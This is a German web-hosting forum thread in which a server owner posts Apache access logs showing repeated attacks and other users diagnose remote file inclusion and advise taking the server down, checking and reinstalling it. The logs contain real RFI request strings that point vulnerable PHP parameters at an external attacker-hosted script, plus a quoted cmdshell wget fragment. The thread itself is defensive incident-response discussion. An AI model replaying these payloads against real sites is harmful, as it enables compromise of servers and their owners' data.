Angriffe auf Apache seit 2 Tagen!

A

afroasiate

Registered User
Hallo,

hab seit 3 Tagen folgendes Problem:

Irgend jemand versucht scheinbar meinen Server zum absturzt zubringen.

Es entsteht ein hoher Incoming Traffic über irgend welche anfragen an den Apache.

Anbei seht Ihr ein Diagramm vom Incoming Traffic.

Das führt zwar nicht zu einer hohen CPU Last aber es entstehen mit der Zeit eine ganze reihe von Prozesse die von user wwrun stammen und bei dennen es sich scheinbar um ein perl script handelt es es aber immer nur ganz kurz läuft und gleich wieder abbricht.

Nun entwickelt sich das schon seit 3 Tagen folgendermaßen.

Samstag ab 11:30 -24 Uhr nach einem Server Neustart war Ruhe
Sonntag 15 - 18 Uhr nachdem ich den Apache Dienst für 30 min abgeschaltet hatte war Ruhe
Montag 14:30 14:40 hab ich den Apache für 30 min. abgeschaltet, danach Ruhe.



Hier der Auszug aus der /var/log/apache2/access_log

Code: 
127.0.0.1 - - [03/Dec/2007:14:27:30 +0100] "GET /?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:14:27:34 +0100] "GET /?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:14:27:49 +0100] "GET / HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:14:27:50 +0100] "GET / HTTP/1.1" 200 831 "-" "libwww-perl/5.803"


Hat jemand einen Tip für mich?

cu
afroasiate
 

Attachments

  • server.jpg
    server.jpg
    74.8 KB · Views: 140
Nabend,

okay jetzt wird einiges klar.

Hmm was genau kann ich jetzt unternehmen? Vor allem damit der Angreifer
langsam aufgibt.

Hatte gegen 18Uhr gleich wieder einen Angriffsversuch.

Was haltet Ihr davon? Die Idee stammt von "Blackbit" aus diesem Beitrag hier:

DoS?

/logiasite.webcindario.com/cmdshell.txt?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 131.161.89.36 - - [06/Mar/2006:06:56:50 +0100] "GET / HTTP/1.0" 302 - "-" "-" 81.169.176.15 - - [06/Mar/2006:07:41:20 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"...
serversupportforum.de serversupportforum.de
Code: 
        #Block DFind
        for ip in `cat /var/log/apache2/error_log |grep w00tw00t | awk '{print $8}' | sed 's/]//g'  | sort -ug` ; do
                countoff=$[$countoff+1]
                countwoot=$[$countwoot+1]
                iptables -I INPUT -s $ip -j DROP
                iptables -I OUTPUT -s $ip -j DROP
        done


Code: 
81.169.179.254 - - [03/Dec/2007:19:02:12 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 303 "-" "-"
85.214.67.237 - - [03/Dec/2007:19:10:40 +0100] "GET / HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
91.126.25.179 - - [03/Dec/2007:19:24:54 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 303 "-" "-"
127.0.0.1 - - [03/Dec/2007:19:48:17 +0100] "GET /?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:06:38 +0100] "GET /?languagePath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:06:38 +0100] "GET /?languagePath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:16:23 +0100] "GET /comments-display-tpl.php?config[comments_form_tpl]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 1041 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:21:31 +0100] "GET /?config%5bcomments_form_tpl%5d=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:21:31 +0100] "GET /?config%5bcomments_form_tpl%5d=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:21:42 +0100] "GET /guestbook/comments-display-tpl.php?config[comments_form_tpl]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 1041 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:22:27 +0100] "GET /?_CCFG%5b_PKG_PATH_INCL%5d=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:22:42 +0100] "GET /?heigh...pThis=true&TB_iframe=true/comments-display-tpl.php%3fconfig%5bcomments_form_tpl%5d=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:22:44 +0100] "GET /?config%5bcomments_form_tpl%5d=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:28:55 +0100] "GET /?mod=siteinfo&id=4//coin_includes/constants.php%3f_CCFG%5b_PKG_PATH_INCL%5d=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:20:32:41 +0100] "GET /?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
 
Und wieso machst du nichts dagegen? Zum Beispiel den Webserver beenden, erstmal Lücken stopfen und eine Systemanalyse durchführen?
 
Das hat doch Roger Wilco grade oben geschrieben. Erst mal den Webserver stoppen, und dann mal die Logfiles checken!!!
 
Solange der Server (noch) nicht kompromittiert wurde und es sich wirklich nur um einen popligen DoS per RFI handelt empfiehlt sich das mod security Modul für den Apache Server, damit kannst du solche Requests ganz einfach blocken. Bei mir laufen einige phpnuke/phpbb Sites und da sind 100 solcher Skiddie "Angriffe" am Tag nichts ungewöhnliches.
Alllerdings ist das Ziel von RFIs normalerweise kein DoS sondern die Kiste zu rooten, also wie Andere vor mir schon empfohlen haben: System checken, und im Zweifel lieber Neuinstallation....;)
 
Hi,

bad_brain said:
Solange der Server (noch) nicht kompromittiert wurde ...
Click to expand...

das hat sich ja laut den Logfiles schon erledigt.

@afroasiate:

1. Apache stoppen und dafür sorgen, dass der nicht über nen Cronjob neu startet.
2. Sicherheitslücken ausfindig machen
3. Datensicherung
4. Neuinstallation
5. siehe 1.
6. Rücksicherung der Daten
7. Sicherheitslücken in den einzelnen Systemen stopfen
8. Apache starten


Das ist imho die einzig sichere Lösung, da Du nicht wissen kannst, ob zwischenzeitlich weitere Teile des Systems kompromittiert wurden.

-W
 
...oder alternativ einen Admin engagieren, der sich damit auskennt.
Das ganze jedenfalls fix, bevor Angriffe von Deinem Server auf andere übergehen und Dein Anbieter Dir den Server sperrt.

huschi.
 
You must log in or register to reply here.
Back
Top